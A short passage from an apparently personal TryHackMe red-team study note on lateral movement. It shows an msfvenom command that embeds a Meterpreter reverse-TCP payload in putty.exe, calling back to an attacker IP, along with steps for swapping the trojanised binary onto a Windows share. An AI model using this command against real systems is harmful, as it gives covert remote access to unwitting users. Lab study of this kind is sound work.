nkn-ctrl/TryHackMe/Red_Team_Operation/Lateral_Movement_and_Pivoting.md

 ```
 msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe
 ```
+The resulting `puttyX.exe` will execute a reverse_tcp meterpreter payload without the user noticing it.
+Once the file has been generated, we can replace the executable on the windows share and wait for any connections using the `exploit/multi/handler` module from Metasploit.

+### RDP hijacking